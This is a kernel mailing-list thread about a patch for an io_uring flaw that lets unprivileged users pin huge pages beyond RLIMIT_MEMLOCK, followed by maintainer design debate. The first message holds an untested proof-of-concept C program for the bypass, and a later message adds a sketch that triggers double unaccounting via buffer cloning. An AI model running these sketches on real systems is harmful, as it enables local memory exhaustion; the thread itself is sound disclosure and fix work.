public inbox for io-uring@vger.kernel.org
* [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
@ 2026-01-19  7:10 Yuhao Jiang
  2026-01-19 17:03 ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Yuhao Jiang @ 2026-01-19  7:10 UTC (permalink / raw)
  To: Jens Axboe, Pavel Begunkov; +Cc: io-uring, linux-kernel, stable, Yuhao Jiang

When multiple registered buffers share the same compound page, only the
first buffer accounts for the memory via io_buffer_account_pin(). The
subsequent buffers skip accounting since headpage_already_acct() returns
true.

When the first buffer is unregistered, the accounting is decremented,
but the compound page remains pinned by the remaining buffers. This
creates a state where pinned memory is not properly accounted against
RLIMIT_MEMLOCK.

On systems with HugeTLB pages pre-allocated, an unprivileged user can
exploit this to pin memory beyond RLIMIT_MEMLOCK by cycling buffer
registrations. The bypass amount is proportional to the number of
available huge pages, potentially allowing gigabytes of memory to be
pinned while the kernel accounting shows near-zero.
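
For illustration, a rough and untested sketch of that cycle (liburing
calls; error handling omitted, slot layout and sizes are arbitrary).
It assumes 2MB HugeTLB pages are pre-allocated and RLIMIT_MEMLOCK is
small:

#include <sys/mman.h>
#include <unistd.h>
#include "liburing.h"

#define HPAGE_SZ	(2UL * 1024 * 1024)
#define NR_HPAGES	64

int main(void)
{
	struct io_uring ring;
	struct iovec iov;
	int i;

	io_uring_queue_init(8, &ring, 0);
	/* NR_HPAGES "holder" slots plus one scratch slot at the end */
	io_uring_register_buffers_sparse(&ring, NR_HPAGES + 1);

	for (i = 0; i < NR_HPAGES; i++) {
		void *p = mmap(NULL, HPAGE_SZ, PROT_READ | PROT_WRITE,
			       MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB,
			       -1, 0);

		/* scratch slot pins and accounts the whole huge page */
		iov = (struct iovec) { .iov_base = p, .iov_len = HPAGE_SZ };
		io_uring_register_buffers_update_tag(&ring, NR_HPAGES,
						     &iov, NULL, 1);

		/* holder shares the compound page, skips accounting */
		iov = (struct iovec) { .iov_base = p, .iov_len = 4096 };
		io_uring_register_buffers_update_tag(&ring, i, &iov, NULL, 1);

		/*
		 * Clearing the scratch slot unaccounts the huge page, but
		 * the holder keeps it pinned: accounting is back near zero.
		 */
		iov = (struct iovec) { .iov_base = NULL, .iov_len = 0 };
		io_uring_register_buffers_update_tag(&ring, NR_HPAGES,
						     &iov, NULL, 1);
	}

	/* NR_HPAGES huge pages stay pinned with almost nothing accounted */
	pause();
	return 0;
}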

Fix this by removing the cross-buffer accounting optimization entirely.
Each buffer now independently accounts for its pinned pages, even if
the same compound pages are referenced by other buffers. This prevents
accounting underflow when buffers are unregistered in arbitrary order.

The trade-off is that memory accounting may be overestimated when
multiple buffers share compound pages, but this is safe and prevents
the security issue.

Reported-by: Yuhao Jiang <danisjiang@gmail.com>
Suggested-by: Pavel Begunkov <asml.silence@gmail.com>
Fixes: de2939388be5 ("io_uring: improve registered buffer accounting for huge pages")
Cc: stable@vger.kernel.org
Signed-off-by: Yuhao Jiang <danisjiang@gmail.com>
---
Changes in v2:
  - Remove cross-buffer accounting logic entirely
  - Link to v1: https://lore.kernel.org/all/20251218025947.36115-1-danisjiang@gmail.com/

 io_uring/rsrc.c | 43 -------------------------------------------
 1 file changed, 43 deletions(-)

diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
index 41c89f5c616d..f35652f36c57 100644
--- a/io_uring/rsrc.c
+++ b/io_uring/rsrc.c
@@ -619,47 +619,6 @@ int io_sqe_buffers_unregister(struct io_ring_ctx *ctx)
 	return 0;
 }
 
-/*
- * Not super efficient, but this is just a registration time. And we do cache
- * the last compound head, so generally we'll only do a full search if we don't
- * match that one.
- *
- * We check if the given compound head page has already been accounted, to
- * avoid double accounting it. This allows us to account the full size of the
- * page, not just the constituent pages of a huge page.
- */
-static bool headpage_already_acct(struct io_ring_ctx *ctx, struct page **pages,
-				  int nr_pages, struct page *hpage)
-{
-	int i, j;
-
-	/* check current page array */
-	for (i = 0; i < nr_pages; i++) {
-		if (!PageCompound(pages[i]))
-			continue;
-		if (compound_head(pages[i]) == hpage)
-			return true;
-	}
-
-	/* check previously registered pages */
-	for (i = 0; i < ctx->buf_table.nr; i++) {
-		struct io_rsrc_node *node = ctx->buf_table.nodes[i];
-		struct io_mapped_ubuf *imu;
-
-		if (!node)
-			continue;
-		imu = node->buf;
-		for (j = 0; j < imu->nr_bvecs; j++) {
-			if (!PageCompound(imu->bvec[j].bv_page))
-				continue;
-			if (compound_head(imu->bvec[j].bv_page) == hpage)
-				return true;
-		}
-	}
-
-	return false;
-}
-
 static int io_buffer_account_pin(struct io_ring_ctx *ctx, struct page **pages,
 				 int nr_pages, struct io_mapped_ubuf *imu,
 				 struct page **last_hpage)
@@ -677,8 +636,6 @@ static int io_buffer_account_pin(struct io_ring_ctx *ctx, struct page **pages,
 			if (hpage == *last_hpage)
 				continue;
 			*last_hpage = hpage;
-			if (headpage_already_acct(ctx, pages, i, hpage))
-				continue;
 			imu->acct_pages += page_size(hpage) >> PAGE_SHIFT;
 		}
 	}
-- 
2.34.1


^ permalink raw reply related	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-19  7:10 [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting Yuhao Jiang
@ 2026-01-19 17:03 ` Jens Axboe
  2026-01-19 23:34   ` Yuhao Jiang
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-19 17:03 UTC (permalink / raw)
  To: Yuhao Jiang, Pavel Begunkov; +Cc: io-uring, linux-kernel, stable

On 1/19/26 12:10 AM, Yuhao Jiang wrote:
> The trade-off is that memory accounting may be overestimated when
> multiple buffers share compound pages, but this is safe and prevents
> the security issue.

I'd be worried that this would break existing setups. We obviously need
to get the unmap accounting correct, but in terms of practicality, any
user of registered buffers will have had to bump distro limits manually
anyway, and in that case it's usually just set very high. Otherwise
there's very little you can do with it.

How about something else entirely - just track the accounted pages on
the side. If we ref those, then we can ensure that if a huge page is
accounted, it's only unaccounted when all existing "users" of it have
gone away. That means if you drop parts of it, it'll remain accounted.

Something totally untested like the below... Yes it's not a trivial
amount of code, but it is actually fairly trivial code.

diff --git a/include/linux/io_uring_types.h b/include/linux/io_uring_types.h
index a3e8ddc9b380..bd92c01f4401 100644
--- a/include/linux/io_uring_types.h
+++ b/include/linux/io_uring_types.h
@@ -423,6 +423,7 @@ struct io_ring_ctx {
 	/* Only used for accounting purposes */
 	struct user_struct		*user;
 	struct mm_struct		*mm_account;
+	struct xarray			hpage_acct;
 
 	/*
 	 * List of tctx nodes for this ctx, protected by tctx_lock. For
diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index b7a077c11c21..9e810d4f872c 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
@@ -292,6 +292,7 @@ static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
 		return NULL;
 
 	xa_init(&ctx->io_bl_xa);
+	xa_init(&ctx->hpage_acct);
 
 	/*
 	 * Use 5 bits less than the max cq entries, that should give us around
@@ -361,6 +362,7 @@ static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
 	io_free_alloc_caches(ctx);
 	kvfree(ctx->cancel_table.hbs);
 	xa_destroy(&ctx->io_bl_xa);
+	xa_destroy(&ctx->hpage_acct);
 	kfree(ctx);
 	return NULL;
 }
@@ -2880,6 +2882,7 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
 	io_napi_free(ctx);
 	kvfree(ctx->cancel_table.hbs);
 	xa_destroy(&ctx->io_bl_xa);
+	xa_destroy(&ctx->hpage_acct);
 	kfree(ctx);
 }
 
diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
index 41c89f5c616d..a2ee8840b479 100644
--- a/io_uring/rsrc.c
+++ b/io_uring/rsrc.c
@@ -28,7 +28,7 @@ struct io_rsrc_update {
 };
 
 static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
-			struct iovec *iov, struct page **last_hpage);
+						   struct iovec *iov);
 
 /* only define max */
 #define IORING_MAX_FIXED_FILES	(1U << 20)
@@ -139,15 +139,75 @@ static void io_free_imu(struct io_ring_ctx *ctx, struct io_mapped_ubuf *imu)
 		kvfree(imu);
 }
 
+/*
+ * Loop pages in this imu, and drop a reference to the accounted page
+ * in the ->hpage_acct xarray. If ours is the last reference, kill
+ * the entry and return pages to unaccount.
+ */
+static unsigned long io_buffer_unmap_pages(struct io_ring_ctx *ctx,
+					   struct io_mapped_ubuf *imu)
+{
+	struct page *seen = NULL;
+	unsigned long acct = 0;
+	int i;
+
+	/* Kernel buffers don't participate in RLIMIT_MEMLOCK accounting */
+	if (imu->is_kbuf)
+		return 0;
+
+	for (i = 0; i < imu->nr_bvecs; i++) {
+		struct page *page = imu->bvec[i].bv_page;
+		struct page *hpage;
+		unsigned long key;
+		void *entry;
+		unsigned long count;
+
+		if (!PageCompound(page)) {
+			acct++;
+			continue;
+		}
+
+		hpage = compound_head(page);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
+
+		key = (unsigned long) hpage;
+		entry = xa_load(&ctx->hpage_acct, key);
+		if (!entry) {
+			/* can't happen... */
+			WARN_ON_ONCE(1);
+			continue;
+		}
+
+		count = xa_to_value(entry);
+		if (count == 1) {
+			/* Last reference in this ctx, remove from xarray */
+			xa_erase(&ctx->hpage_acct, key);
+			acct += page_size(hpage) >> PAGE_SHIFT;
+		} else {
+			xa_store(&ctx->hpage_acct, key,
+				 xa_mk_value(count - 1), GFP_KERNEL);
+		}
+	}
+
+	return acct;
+}
+
 static void io_buffer_unmap(struct io_ring_ctx *ctx, struct io_mapped_ubuf *imu)
 {
+	unsigned long acct_pages;
+
+	/* Always decrement, so it works for cloned buffers too */
+	acct_pages = io_buffer_unmap_pages(ctx, imu);
+
 	if (unlikely(refcount_read(&imu->refs) > 1)) {
 		if (!refcount_dec_and_test(&imu->refs))
 			return;
 	}
 
-	if (imu->acct_pages)
-		io_unaccount_mem(ctx->user, ctx->mm_account, imu->acct_pages);
+	if (acct_pages)
+		io_unaccount_mem(ctx->user, ctx->mm_account, acct_pages);
 	imu->release(imu->priv);
 	io_free_imu(ctx, imu);
 }
@@ -294,7 +354,6 @@ static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
 {
 	u64 __user *tags = u64_to_user_ptr(up->tags);
 	struct iovec fast_iov, *iov;
-	struct page *last_hpage = NULL;
 	struct iovec __user *uvec;
 	u64 user_data = up->data;
 	__u32 done;
@@ -322,7 +381,7 @@ static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
 		err = io_buffer_validate(iov);
 		if (err)
 			break;
-		node = io_sqe_buffer_register(ctx, iov, &last_hpage);
+		node = io_sqe_buffer_register(ctx, iov);
 		if (IS_ERR(node)) {
 			err = PTR_ERR(node);
 			break;
@@ -619,77 +678,69 @@ int io_sqe_buffers_unregister(struct io_ring_ctx *ctx)
 	return 0;
 }
 
-/*
- * Not super efficient, but this is just a registration time. And we do cache
- * the last compound head, so generally we'll only do a full search if we don't
- * match that one.
- *
- * We check if the given compound head page has already been accounted, to
- * avoid double accounting it. This allows us to account the full size of the
- * page, not just the constituent pages of a huge page.
- */
-static bool headpage_already_acct(struct io_ring_ctx *ctx, struct page **pages,
-				  int nr_pages, struct page *hpage)
+static int io_buffer_account_pin(struct io_ring_ctx *ctx, struct page **pages,
+				 int nr_pages, struct io_mapped_ubuf *imu)
 {
-	int i, j;
+	struct page *seen = NULL;
+	int i, ret;
 
-	/* check current page array */
+	imu->acct_pages = 0;
+
+	/* First pass: calculate pages to account */
 	for (i = 0; i < nr_pages; i++) {
-		if (!PageCompound(pages[i]))
+		struct page *hpage;
+		unsigned long key;
+
+		if (!PageCompound(pages[i])) {
+			imu->acct_pages++;
 			continue;
-		if (compound_head(pages[i]) == hpage)
-			return true;
-	}
+		}
 
-	/* check previously registered pages */
-	for (i = 0; i < ctx->buf_table.nr; i++) {
-		struct io_rsrc_node *node = ctx->buf_table.nodes[i];
-		struct io_mapped_ubuf *imu;
+		hpage = compound_head(pages[i]);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
 
-		if (!node)
+		/* Check if already tracked globally */
+		key = (unsigned long) hpage;
+		if (xa_load(&ctx->hpage_acct, key))
 			continue;
-		imu = node->buf;
-		for (j = 0; j < imu->nr_bvecs; j++) {
-			if (!PageCompound(imu->bvec[j].bv_page))
-				continue;
-			if (compound_head(imu->bvec[j].bv_page) == hpage)
-				return true;
+
+		imu->acct_pages += page_size(hpage) >> PAGE_SHIFT;
+	}
+
+	/* Try to account the memory */
+	if (imu->acct_pages) {
+		ret = io_account_mem(ctx->user, ctx->mm_account, imu->acct_pages);
+		if (ret) {
+			imu->acct_pages = 0;
+			return ret;
 		}
 	}
 
-	return false;
-}
+	/* Second pass: update xarray refcounts */
+	seen = NULL;
+	for (i = 0; i < nr_pages; i++) {
+		struct page *hpage;
+		unsigned long key;
+		void *entry;
+		unsigned long count;
 
-static int io_buffer_account_pin(struct io_ring_ctx *ctx, struct page **pages,
-				 int nr_pages, struct io_mapped_ubuf *imu,
-				 struct page **last_hpage)
-{
-	int i, ret;
+		if (!PageCompound(pages[i]))
+			continue;
 
-	imu->acct_pages = 0;
-	for (i = 0; i < nr_pages; i++) {
-		if (!PageCompound(pages[i])) {
-			imu->acct_pages++;
-		} else {
-			struct page *hpage;
-
-			hpage = compound_head(pages[i]);
-			if (hpage == *last_hpage)
-				continue;
-			*last_hpage = hpage;
-			if (headpage_already_acct(ctx, pages, i, hpage))
-				continue;
-			imu->acct_pages += page_size(hpage) >> PAGE_SHIFT;
-		}
-	}
+		hpage = compound_head(pages[i]);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
 
-	if (!imu->acct_pages)
-		return 0;
+		key = (unsigned long) hpage;
+		entry = xa_load(&ctx->hpage_acct, key);
+		count = entry ? xa_to_value(entry) + 1 : 1;
+		xa_store(&ctx->hpage_acct, key, xa_mk_value(count), GFP_KERNEL);
+	}
 
-	ret = io_account_mem(ctx->user, ctx->mm_account, imu->acct_pages);
-	if (ret)
-		imu->acct_pages = 0;
-	return ret;
+	return 0;
 }
 
 static bool io_coalesce_buffer(struct page ***pages, int *nr_pages,
@@ -778,8 +829,7 @@ bool io_check_coalesce_buffer(struct page **page_array, int nr_pages,
 }
 
 static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
-						   struct iovec *iov,
-						   struct page **last_hpage)
+						   struct iovec *iov)
 {
 	struct io_mapped_ubuf *imu = NULL;
 	struct page **pages = NULL;
@@ -817,7 +867,7 @@ static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
 		goto done;
 
 	imu->nr_bvecs = nr_pages;
-	ret = io_buffer_account_pin(ctx, pages, nr_pages, imu, last_hpage);
+	ret = io_buffer_account_pin(ctx, pages, nr_pages, imu);
 	if (ret)
 		goto done;
 
@@ -867,7 +917,6 @@ static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
 int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
 			    unsigned int nr_args, u64 __user *tags)
 {
-	struct page *last_hpage = NULL;
 	struct io_rsrc_data data;
 	struct iovec fast_iov, *iov = &fast_iov;
 	const struct iovec __user *uvec;
@@ -913,7 +962,7 @@ int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
 			}
 		}
 
-		node = io_sqe_buffer_register(ctx, iov, &last_hpage);
+		node = io_sqe_buffer_register(ctx, iov);
 		if (IS_ERR(node)) {
 			ret = PTR_ERR(node);
 			break;
@@ -1152,6 +1201,38 @@ int io_import_reg_buf(struct io_kiocb *req, struct iov_iter *iter,
 	return io_import_fixed(ddir, iter, node->buf, buf_addr, len);
 }
 
+static void io_buffer_add_cloned_hpages(struct io_ring_ctx *ctx,
+					struct io_mapped_ubuf *imu)
+{
+	struct page *seen = NULL;
+	int i;
+
+	if (imu->is_kbuf)
+		return;
+
+	for (i = 0; i < imu->nr_bvecs; i++) {
+		struct page *page = imu->bvec[i].bv_page;
+		struct page *hpage;
+		unsigned long key;
+		void *entry;
+		unsigned long count;
+
+		if (!PageCompound(page))
+			continue;
+
+		hpage = compound_head(page);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
+
+		/* Add or increment entry in destination context's hpage_acct */
+		key = (unsigned long) hpage;
+		entry = xa_load(&ctx->hpage_acct, key);
+		count = entry ? xa_to_value(entry) + 1 : 1;
+		xa_store(&ctx->hpage_acct, key, xa_mk_value(count), GFP_KERNEL);
+	}
+}
+
 /* Lock two rings at once. The rings must be different! */
 static void lock_two_rings(struct io_ring_ctx *ctx1, struct io_ring_ctx *ctx2)
 {
@@ -1234,6 +1315,8 @@ static int io_clone_buffers(struct io_ring_ctx *ctx, struct io_ring_ctx *src_ctx
 
 			refcount_inc(&src_node->buf->refs);
 			dst_node->buf = src_node->buf;
+			/* track compound references to clones */
+			io_buffer_add_cloned_hpages(ctx, src_node->buf);
 		}
 		data.nodes[off++] = dst_node;
 		i++;

-- 
Jens Axboe

^ permalink raw reply related	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-19 17:03 ` Jens Axboe
@ 2026-01-19 23:34   ` Yuhao Jiang
  2026-01-19 23:40     ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Yuhao Jiang @ 2026-01-19 23:34 UTC (permalink / raw)
  To: Jens Axboe; +Cc: Pavel Begunkov, io-uring, linux-kernel, stable

On Mon, Jan 19, 2026 at 11:03 AM Jens Axboe <axboe@kernel.dk> wrote:
>
> On 1/19/26 12:10 AM, Yuhao Jiang wrote:
> > The trade-off is that memory accounting may be overestimated when
> > multiple buffers share compound pages, but this is safe and prevents
> > the security issue.
>
> I'd be worried that this would break existing setups. We obviously need
> to get the unmap accounting correct, but in terms of practicality, any
> user of registered buffers will have had to bump distro limits manually
> anyway, and in that case it's usually just set very high. Otherwise
> there's very little you can do with it.
>
> How about something else entirely - just track the accounted pages on
> the side. If we ref those, then we can ensure that if a huge page is
> accounted, it's only unaccounted when all existing "users" of it have
> gone away. That means if you drop parts of it, it'll remain accounted.
>
> Something totally untested like the below... Yes it's not a trivial
> amount of code, but it is actually fairly trivial code.

Thanks, this approach makes sense. I'll send a v3 based on this.

--
Yuhao Jiang

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-19 23:34   ` Yuhao Jiang
@ 2026-01-19 23:40     ` Jens Axboe
  2026-01-20  7:05       ` Yuhao Jiang
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-19 23:40 UTC (permalink / raw)
  To: Yuhao Jiang; +Cc: Pavel Begunkov, io-uring, linux-kernel, stable

On 1/19/26 4:34 PM, Yuhao Jiang wrote:
> On Mon, Jan 19, 2026 at 11:03 AM Jens Axboe <axboe@kernel.dk> wrote:
>>
>> On 1/19/26 12:10 AM, Yuhao Jiang wrote:
>>> The trade-off is that memory accounting may be overestimated when
>>> multiple buffers share compound pages, but this is safe and prevents
>>> the security issue.
>>
>> I'd be worried that this would break existing setups. We obviously need
>> to get the unmap accounting correct, but in terms of practicality, any
>> user of registered buffers will have had to bump distro limits manually
>> anyway, and in that case it's usually just set very high. Otherwise
>> there's very little you can do with it.
>>
>> How about something else entirely - just track the accounted pages on
>> the side. If we ref those, then we can ensure that if a huge page is
>> accounted, it's only unaccounted when all existing "users" of it have
>> gone away. That means if you drop parts of it, it'll remain accounted.
>>
>> Something totally untested like the below... Yes it's not a trivial
>> amount of code, but it is actually fairly trivial code.
> 
> Thanks, this approach makes sense. I'll send a v3 based on this.

Great, thanks! I think the key is tracking this on the side, and then
a ref to tell when it's safe to unaccount it. The rest is just
implementation details.

-- 
Jens Axboe


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-19 23:40     ` Jens Axboe
@ 2026-01-20  7:05       ` Yuhao Jiang
  2026-01-20 12:04         ` Jens Axboe
  2026-01-20 12:05         ` Pavel Begunkov
  0 siblings, 2 replies; 22+ messages in thread
From: Yuhao Jiang @ 2026-01-20  7:05 UTC (permalink / raw)
  To: Jens Axboe; +Cc: Pavel Begunkov, io-uring, linux-kernel, stable

Hi Jens,

On Mon, Jan 19, 2026 at 5:40 PM Jens Axboe <axboe@kernel.dk> wrote:
>
> On 1/19/26 4:34 PM, Yuhao Jiang wrote:
> > On Mon, Jan 19, 2026 at 11:03 AM Jens Axboe <axboe@kernel.dk> wrote:
> >>
> >> On 1/19/26 12:10 AM, Yuhao Jiang wrote:
> >>> The trade-off is that memory accounting may be overestimated when
> >>> multiple buffers share compound pages, but this is safe and prevents
> >>> the security issue.
> >>
> >> I'd be worried that this would break existing setups. We obviously need
> >> to get the unmap accounting correct, but in terms of practicality, any
> >> user of registered buffers will have had to bump distro limits manually
> >> anyway, and in that case it's usually just set very high. Otherwise
> >> there's very little you can do with it.
> >>
> >> How about something else entirely - just track the accounted pages on
> >> the side. If we ref those, then we can ensure that if a huge page is
> >> accounted, it's only unaccounted when all existing "users" of it have
> >> gone away. That means if you drop parts of it, it'll remain accounted.
> >>
> >> Something totally untested like the below... Yes it's not a trivial
> >> amount of code, but it is actually fairly trivial code.
> >
> > Thanks, this approach makes sense. I'll send a v3 based on this.
>
> Great, thanks! I think the key is tracking this on the side, and then
> a ref to tell when it's safe to unaccount it. The rest is just
> implementation details.
>
> --
> Jens Axboe
>

I've been implementing the xarray-based ref tracking approach for v3.
While working on it, I discovered an issue with buffer cloning.

If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
and unaccount, so we double-unaccount and user->locked_vm goes negative.

The per-context xarray can't coordinate across clones - each context
tracks its own refcount independently. I think we either need a global
xarray (shared across all contexts), or just go back to v2. What do
you think?
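
For reference, an untested sketch of that sequence (illustrative only,
assuming a per-context xarray along the lines of the earlier diff, not
current mainline behaviour; HPAGE_SZ and the mmap flags are arbitrary):

#include <sys/mman.h>
#include "liburing.h"

#define HPAGE_SZ	(2UL * 1024 * 1024)

static void clone_then_double_unaccount(void)
{
	struct io_uring a, b;
	struct iovec iov[2];
	void *p;

	p = mmap(NULL, HPAGE_SZ, PROT_READ | PROT_WRITE,
		 MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB, -1, 0);

	io_uring_queue_init(8, &a, 0);
	io_uring_queue_init(8, &b, 0);

	/* two buffers over the same huge page: a's xarray has hpage -> 2 */
	iov[0] = (struct iovec) { .iov_base = p, .iov_len = HPAGE_SZ };
	iov[1] = (struct iovec) { .iov_base = p, .iov_len = 4096 };
	io_uring_register_buffers(&a, iov, 2);

	/* clone into b: b's private xarray also ends up at hpage -> 2 */
	io_uring_clone_buffers(&b, &a);

	/*
	 * Each context's refcount drops to zero independently, so both
	 * sides think they hold the last reference and unaccount the
	 * huge page, underflowing user->locked_vm.
	 */
	io_uring_queue_exit(&a);
	io_uring_queue_exit(&b);
}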

-- 
Yuhao Jiang

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-20  7:05       ` Yuhao Jiang
@ 2026-01-20 12:04         ` Jens Axboe
  2026-01-20 12:05         ` Pavel Begunkov
  1 sibling, 0 replies; 22+ messages in thread
From: Jens Axboe @ 2026-01-20 12:04 UTC (permalink / raw)
  To: Yuhao Jiang; +Cc: Pavel Begunkov, io-uring, linux-kernel, stable

On 1/20/26 12:05 AM, Yuhao Jiang wrote:
> Hi Jens,
> 
> On Mon, Jan 19, 2026 at 5:40 PM Jens Axboe <axboe@kernel.dk> wrote:
>>
>> On 1/19/26 4:34 PM, Yuhao Jiang wrote:
>>> On Mon, Jan 19, 2026 at 11:03 AM Jens Axboe <axboe@kernel.dk> wrote:
>>>>
>>>> On 1/19/26 12:10 AM, Yuhao Jiang wrote:
>>>>> The trade-off is that memory accounting may be overestimated when
>>>>> multiple buffers share compound pages, but this is safe and prevents
>>>>> the security issue.
>>>>
>>>> I'd be worried that this would break existing setups. We obviously need
>>>> to get the unmap accounting correct, but in terms of practicality, any
>>>> user of registered buffers will have had to bump distro limits manually
>>>> anyway, and in that case it's usually just set very high. Otherwise
>>>> there's very little you can do with it.
>>>>
>>>> How about something else entirely - just track the accounted pages on
>>>> the side. If we ref those, then we can ensure that if a huge page is
>>>> accounted, it's only unaccounted when all existing "users" of it have
>>>> gone away. That means if you drop parts of it, it'll remain accounted.
>>>>
>>>> Something totally untested like the below... Yes it's not a trivial
>>>> amount of code, but it is actually fairly trivial code.
>>>
>>> Thanks, this approach makes sense. I'll send a v3 based on this.
>>
>> Great, thanks! I think the key is tracking this on the side, and then
>> a ref to tell when it's safe to unaccount it. The rest is just
>> implementation details.
>>
>> --
>> Jens Axboe
>>
> 
> I've been implementing the xarray-based ref tracking approach for v3.
> While working on it, I discovered an issue with buffer cloning.
> 
> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
> and unaccount, so we double-unaccount and user->locked_vm goes negative.
> 
> The per-context xarray can't coordinate across clones - each context
> tracks its own refcount independently. I think we either need a global
> xarray (shared across all contexts), or just go back to v2. What do
> you think?

Ah right, yes that is obviously true. Honestly having a shared xarray
for this is probably even better, rather than one per ctx. Should not
change the code very much over the existing test patch. And it won't
consume memory on a per-ring basis. Downside is of course the need
to synchronize updates, but should not be a big deal as accounting
isn't a fast path. IMHO, just go that route.
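
For reference, a rough sketch of what refcounting compound heads in one
globally shared xarray under xa_lock() could look like. Names are made
up, __xa_store() allocation failures are ignored, and as noted later in
the thread the key would really need to include the user/mm as well:

#include <linux/xarray.h>
#include <linux/mm.h>

static DEFINE_XARRAY(io_hpage_acct);

/* Returns true if this was the first ref, i.e. the caller should account */
static bool io_hpage_acct_get(struct page *hpage)
{
	unsigned long key = (unsigned long) hpage;
	void *old;

	xa_lock(&io_hpage_acct);
	old = xa_load(&io_hpage_acct, key);
	__xa_store(&io_hpage_acct, key,
		   xa_mk_value(old ? xa_to_value(old) + 1 : 1), GFP_ATOMIC);
	xa_unlock(&io_hpage_acct);
	return !old;
}

/* Returns true if this was the last ref, i.e. the caller should unaccount */
static bool io_hpage_acct_put(struct page *hpage)
{
	unsigned long key = (unsigned long) hpage;
	unsigned long cnt;
	void *old;

	xa_lock(&io_hpage_acct);
	old = xa_load(&io_hpage_acct, key);
	cnt = old ? xa_to_value(old) : 0;
	if (cnt <= 1)
		__xa_erase(&io_hpage_acct, key);
	else
		__xa_store(&io_hpage_acct, key, xa_mk_value(cnt - 1),
			   GFP_ATOMIC);
	xa_unlock(&io_hpage_acct);
	return cnt <= 1;
}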

-- 
Jens Axboe


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-20  7:05       ` Yuhao Jiang
  2026-01-20 12:04         ` Jens Axboe
@ 2026-01-20 12:05         ` Pavel Begunkov
  2026-01-20 17:03           ` Jens Axboe
  1 sibling, 1 reply; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-20 12:05 UTC (permalink / raw)
  To: Yuhao Jiang, Jens Axboe; +Cc: io-uring, linux-kernel, stable

On 1/20/26 07:05, Yuhao Jiang wrote:
> Hi Jens,
> 
> On Mon, Jan 19, 2026 at 5:40 PM Jens Axboe <axboe@kernel.dk> wrote:
>>
>> On 1/19/26 4:34 PM, Yuhao Jiang wrote:
>>> On Mon, Jan 19, 2026 at 11:03 AM Jens Axboe <axboe@kernel.dk> wrote:
>>>>
>>>> On 1/19/26 12:10 AM, Yuhao Jiang wrote:
>>>>> The trade-off is that memory accounting may be overestimated when
>>>>> multiple buffers share compound pages, but this is safe and prevents
>>>>> the security issue.
>>>>
>>>> I'd be worried that this would break existing setups. We obviously need
>>>> to get the unmap accounting correct, but in terms of practicality, any
>>>> user of registered buffers will have had to bump distro limits manually
>>>> anyway, and in that case it's usually just set very high. Otherwise
>>>> there's very little you can do with it.
>>>>
>>>> How about something else entirely - just track the accounted pages on
>>>> the side. If we ref those, then we can ensure that if a huge page is
>>>> accounted, it's only unaccounted when all existing "users" of it have
>>>> gone away. That means if you drop parts of it, it'll remain accounted.
>>>>
>>>> Something totally untested like the below... Yes it's not a trivial
>>>> amount of code, but it is actually fairly trivial code.
>>>
>>> Thanks, this approach makes sense. I'll send a v3 based on this.
>>
>> Great, thanks! I think the key is tracking this on the side, and then
>> a ref to tell when it's safe to unaccount it. The rest is just
>> implementation details.
>>
>> --
>> Jens Axboe
>>
> 
> I've been implementing the xarray-based ref tracking approach for v3.
> While working on it, I discovered an issue with buffer cloning.
> 
> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
> and unaccount, so we double-unaccount and user->locked_vm goes negative.
> 
> The per-context xarray can't coordinate across clones - each context
> tracks its own refcount independently. I think we either need a global
> xarray (shared across all contexts), or just go back to v2. What do
> you think?

Jens' diff is functionally equivalent to your v1 and has exactly the
same problems. Global tracking won't work well. You can try to double
account clones, or wrap it all together with the xarray into an object
that you share between rings on clone. Just make sure it's protected
right.
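
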